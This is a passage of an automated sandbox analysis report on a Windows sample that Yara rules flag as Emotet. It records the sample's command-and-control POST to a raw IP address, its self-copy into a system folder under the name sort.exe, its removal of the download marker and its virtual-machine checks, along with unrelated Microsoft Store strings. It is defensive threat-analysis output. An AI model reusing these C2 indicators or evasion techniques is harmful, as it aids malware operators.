solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: unknown HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                Accept-Encoding: gzip, deflate
                DNT: 1
                Connection: keep-alive
                Referer: 200.116.145.225/
                Upgrade-Insecure-Requests: 1
                Content-Type: multipart/form-data; boundary=---------hcIbcONok
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: 200.116.145.225:443
                Content-Length: 4628
                Cache-Control: no-cache
                Source: sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp String found in binary or memory: http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
                Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
                Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
                Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
                Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
                Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
                Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
                Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
                Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
                Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
                Source: sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
                Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
                Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
                Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
                Source: 2ojdmC51As.exe, 00000000.00000002.667805094.000000000069A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,0_2_00422473
                Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_00422488
                Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_0041580E
                Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004238DC GetKeyState,GetKeyState,GetKeyState,0_2_004238DC
                Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,0_2_0041E95F
                Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00412ABD
                Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,0_2_00410E05
                Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,1_2_00422473
                Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_00422488
                Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0041580E
                Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004238DC GetKeyState,GetKeyState,GetKeyState,1_2_004238DC
                Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,1_2_0041E95F
                Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_00412ABD
                Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,1_2_00410E05

                E-Banking Fraud:

                Yara detected Emotet
                Source: Yara matchFile source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,1_2_02272650
                Source: C:\Users\user\Desktop\2ojdmC51As.exeFile created: C:\Windows\SysWOW64\setupugc\Jump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeFile deleted: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: String function: 00406520 appears 174 times
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: String function: 00405626 appears 49 times
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: String function: 00406520 appears 168 times
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: String function: 00405626 appears 44 times
                Source: 2ojdmC51As.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2ojdmC51As.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2ojdmC51As.exe, 00000000.00000000.665451688.000000000043C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
                Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 2ojdmC51As.exe
                Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2ojdmC51As.exe
                Source: 2ojdmC51As.exe, 00000000.00000002.668161072.00000000025E0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 2ojdmC51As.exe
                Source: 2ojdmC51As.exeBinary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
                Source: classification engineClassification label: mal80.troj.evad.winEXE@6/0@0/2
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_00418C88 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,0_2_00418C88
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,0_2_022387D0
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02274CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,1_2_02274CB0
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_00412121 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,0_2_00412121
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02235070
                Source: 2ojdmC51As.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\2ojdmC51As.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\2ojdmC51As.exe 'C:\Users\user\Desktop\2ojdmC51As.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Users\user\Desktop\2ojdmC51As.exeProcess created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exeJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,0_2_004013A4
                Source: 2ojdmC51As.exeStatic PE information: real checksum: 0x69574 should be: 0x6a2b7
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_00406520 push eax; ret 0_2_0040653E
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_00406830 push eax; ret 0_2_0040685E
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h0_2_02235E11
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 0000A3FDh0_2_02235EA1
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235EF0 push ecx; mov dword ptr [esp], 0000669Ch0_2_02235EF1
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E36Ch0_2_02235F21
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235CD0 push ecx; mov dword ptr [esp], 00001CE1h0_2_02235CD1
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235D20 push ecx; mov dword ptr [esp], 0000C5A1h0_2_02235D21
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235D00 push ecx; mov dword ptr [esp], 00001F9Eh0_2_02235D01
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235D50 push ecx; mov dword ptr [esp], 00006847h0_2_02235D51
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235D90 push ecx; mov dword ptr [esp], 0000B2E0h0_2_02235D91
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235DF0 push ecx; mov dword ptr [esp], 0000AAF5h0_2_02235DF1
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_02235DC0 push ecx; mov dword ptr [esp], 000089FAh0_2_02235DC1
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_00406520 push eax; ret 1_2_0040653E
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_00406830 push eax; ret 1_2_0040685E
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275E10 push ecx; mov dword ptr [esp], 0000F5B3h1_2_02275E11
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275EA0 push ecx; mov dword ptr [esp], 0000A3FDh1_2_02275EA1
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275EF0 push ecx; mov dword ptr [esp], 0000669Ch1_2_02275EF1
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275F20 push ecx; mov dword ptr [esp], 0000E36Ch1_2_02275F21
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275CD0 push ecx; mov dword ptr [esp], 00001CE1h1_2_02275CD1
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275D20 push ecx; mov dword ptr [esp], 0000C5A1h1_2_02275D21
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275D00 push ecx; mov dword ptr [esp], 00001F9Eh1_2_02275D01
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275D50 push ecx; mov dword ptr [esp], 00006847h1_2_02275D51
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275D90 push ecx; mov dword ptr [esp], 0000B2E0h1_2_02275D91
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275DF0 push ecx; mov dword ptr [esp], 0000AAF5h1_2_02275DF1
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02275DC0 push ecx; mov dword ptr [esp], 000089FAh1_2_02275DC1
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_0223EA26 push ebp; iretd 1_2_0223EA28
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02227A3E push ecx; mov dword ptr [esp], 0000A3FDh1_2_02227A3F
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02227ABE push ecx; mov dword ptr [esp], 0000E36Ch1_2_02227ABF
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_0223EA8B push edi; ret 1_2_0223EAC3
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_02227A8E push ecx; mov dword ptr [esp], 0000669Ch1_2_02227A8F

                Persistence and Installation Behavior:

                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Users\user\Desktop\2ojdmC51As.exeExecutable created and started: C:\Windows\SysWOW64\setupugc\sort.exeJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exePE file moved: C:\Windows\SysWOW64\setupugc\sort.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\2ojdmC51As.exeFile opened: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_0042252B IsWindowVisible,IsIconic,0_2_0042252B
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_004198B0 GetParent,GetParent,GetParent,IsIconic,0_2_004198B0
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00404F00
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_0042252B IsWindowVisible,IsIconic,1_2_0042252B
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_004198B0 GetParent,GetParent,GetParent,IsIconic,1_2_004198B0
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect,1_2_00404F00
                Source: C:\Users\user\Desktop\2ojdmC51As.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\setupugc\sort.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\setupugc\sort.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\setupugc\sort.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\setupugc\sort.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\setupugc\sort.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion:

                Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                Source: C:\Users\user\Desktop\2ojdmC51As.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-25851
                Source: C:\Users\user\Desktop\2ojdmC51As.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02235070
                Source: C:\Users\user\Desktop\2ojdmC51As.exeAPI coverage: 3.2 %
                Source: C:\Windows\SysWOW64\setupugc\sort.exeAPI coverage: 4.8 %
                Source: C:\Windows\System32\svchost.exe TID: 5820Thread sleep time: -150000s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\2ojdmC51As.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_004182CC FindFirstFileA,FindClose,0_2_004182CC
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00417B29
                Source: C:\Users\user\Desktop\2ojdmC51As.exeCode function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_022338F0
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_004182CC FindFirstFileA,FindClose,1_2_004182CC
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,1_2_00417B29
                Source: C:\Windows\SysWOW64\setupugc\sort.exeCode function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,1_2_022738F0
                Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: sort.exe, 00000001.00000002.932241533.0000000002A70000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | API call chain: ExitProcess graph end node | graph_1-33161
                Source: C:\Windows\SysWOW64\setupugc\sort.exe | Process information queried: ProcessInformation
